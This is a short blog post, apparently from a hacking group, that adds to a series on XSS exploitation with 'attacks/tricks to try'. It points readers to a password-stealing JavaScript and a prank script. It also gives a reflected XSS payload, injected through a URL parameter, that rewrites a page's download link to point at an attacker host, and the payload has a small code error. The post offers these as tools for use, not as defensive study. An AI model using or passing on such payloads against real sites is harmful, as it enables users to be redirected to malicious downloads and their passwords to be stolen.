This is a followup from my recent series on XSS exploitation, giving a few extra attacks/tricks to try.
Google's Prank
Google developed a JavaScript code (available here) that you can customize. Basically, it makes all the elements on the page swirl around, fade out to white, and pretends to hack you. Customize it to your own liking.
Password Stealer
Martani Fyssal, a Microsoft developer, created a JavaScript code that steals passwords. You can download it here.
Changing Download
Using this code, you can change the download reference for a website.
index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link0.href="http://attacker.com";}</script>
Just make sure you change the respective variables.
Credits to Ramesh Natarajan.
Persistent Connections
Again by Ramesh, these are two PHP scripts that create a persistent connection.
Change what you want.
Thanks
I'd like to thank the many people who help me study, from the members of C3, to the many pentesters online to take their time to share their knowledge. You guys help keep me going. Many thanks to Ramesh Natarajan for his amazing scripts and his wonderful sharing. And of course, thank you all for keeping this community alive.
C|H of C3
Comments
Be the first, drop a comment!